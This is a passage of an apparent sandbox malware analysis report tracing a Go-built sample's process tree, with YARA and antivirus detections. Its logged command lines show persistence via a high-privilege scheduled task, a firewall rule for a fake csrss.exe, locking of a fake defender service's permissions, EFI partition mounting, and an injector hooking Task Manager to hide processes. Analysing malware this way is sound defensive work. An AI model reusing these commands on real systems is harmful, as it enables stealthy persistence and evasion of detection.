                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: cmd.exe PID: 4420 Parent PID: 3176

                                                                    General

                                                                    Start time:08:01:22
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
                                                                    Imagebase:0x7ff622070000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 4476 Parent PID: 4420

                                                                    General

                                                                    Start time:08:01:22
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: netsh.exe PID: 6380 Parent PID: 4420

                                                                    General

                                                                    Start time:08:01:23
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\netsh.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
                                                                    Imagebase:0x7ff69ecb0000
                                                                    File size:92672 bytes
                                                                    MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 4612 Parent PID: 3176

                                                                    General

                                                                    Start time:08:01:24
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe ''
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Windows\rss\csrss.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 34%, Metadefender, Browse
                                                                    • Detection: 47%, ReversingLabs
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: schtasks.exe PID: 5396 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
                                                                    Imagebase:0x7ff723590000
                                                                    File size:226816 bytes
                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 4648 Parent PID: 5396

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: schtasks.exe PID: 5556 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:27
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                    Imagebase:0x7ff723590000
                                                                    File size:226816 bytes
                                                                    MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 6700 Parent PID: 5556

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 6708 Parent PID: 968

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: mountvol.exe PID: 5704 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:28
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /s
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 2792 Parent PID: 5704

                                                                    General

                                                                    Start time:08:01:29
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: mountvol.exe PID: 6684 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:29
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /d
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 6756 Parent PID: 6684

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 7116 Parent PID: 6708

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: mountvol.exe PID: 7152 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:30
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /s
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 1492 Parent PID: 7152

                                                                    General

                                                                    Start time:08:01:31
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 6860 Parent PID: 3424

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\rss\csrss.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: mountvol.exe PID: 7044 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\mountvol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:mountvol B: /d
                                                                    Imagebase:0x11e0000
                                                                    File size:15360 bytes
                                                                    MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 7064 Parent PID: 7044

                                                                    General

                                                                    Start time:08:01:35
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 616 Parent PID: 6860

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: shutdown.exe PID: 4420 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\shutdown.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:shutdown -r -t 5
                                                                    Imagebase:0x880000
                                                                    File size:23552 bytes
                                                                    MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 6356 Parent PID: 568

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 4476 Parent PID: 4420

                                                                    General

                                                                    Start time:08:01:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 5472 Parent PID: 3424

                                                                    General

                                                                    Start time:08:01:43
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\rss\csrss.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: csrss.exe PID: 4552 Parent PID: 5472

                                                                    General

                                                                    Start time:08:01:45
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\rss\csrss.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\rss\csrss.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: injector.exe PID: 1332 Parent PID: 4612

                                                                    General

                                                                    Start time:08:01:46
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                    Imagebase:0x7ff614880000
                                                                    File size:288256 bytes
                                                                    MD5 hash:D98E33B66343E7C96158444127A117F6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 14%, Metadefender, Browse
                                                                    • Detection: 73%, ReversingLabs

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 1900 Parent PID: 1332

                                                                    General

                                                                    Start time:08:01:46
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 4564 Parent PID: 568

                                                                    General

                                                                    Start time:08:01:47
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 4904 Parent PID: 568

                                                                    General

                                                                    Start time:08:02:02
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 6352 Parent PID: 568

                                                                    General

                                                                    Start time:08:02:15
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6eb840000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: windefender.exe PID: 5628 Parent PID: 4612

                                                                    General

                                                                    Start time:08:02:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\windefender.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\windefender.exe
                                                                    Imagebase:0x400000
                                                                    File size:2102272 bytes
                                                                    MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 41%, ReversingLabs

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 5692 Parent PID: 5628

                                                                    General

                                                                    Start time:08:02:37
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: cmd.exe PID: 6140 Parent PID: 5628

                                                                    General

                                                                    Start time:08:02:38
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: sc.exe PID: 5188 Parent PID: 6140

                                                                    General

                                                                    Start time:08:02:38
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    Imagebase:0x360000
                                                                    File size:60928 bytes
                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Analysis Process: windefender.exe PID: 496 Parent PID: 568

                                                                    General

                                                                    Start time:08:02:39
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\windefender.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\windefender.exe
                                                                    Imagebase:0x400000
                                                                    File size:2102272 bytes
                                                                    MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: jkDmft1Qoe.exe PID: 7032 Parent PID: 4800 jkDmft1Qoe.exeCOMMON

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • ", xrefs: 00428CF9
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                      • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                      • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.665663316.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.665659500.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666046544.000000000069F000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666660726.000000000098A000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.667069636.00000000009FB000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668850529.0000000000C53000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668904539.0000000000C9B000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668910628.0000000000C9D000.00000008.00020000.sdmp Download File
